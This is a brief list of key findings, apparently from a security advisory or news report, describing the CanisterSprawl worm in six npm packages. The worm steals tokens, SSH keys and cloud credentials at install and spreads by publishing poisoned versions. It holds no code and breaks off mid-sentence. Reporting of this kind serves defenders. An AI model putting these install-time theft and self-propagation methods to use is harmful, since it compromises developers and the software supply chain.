Key Findings Self-propagating worm dubbed CanisterSprawl detected in six npm packages, spreading via stolen developer credentials Malware executes during package installation to harvest npm tokens, SSH keys, cloud credentials, and browser data Stolen tokens enable attackers to push poisoned package versions, creating a self-replicating supply chain attack Exfiltration occurs through HTTPS webhook and ICP canister infrastructure designed to resist takedowns Campaign includes c
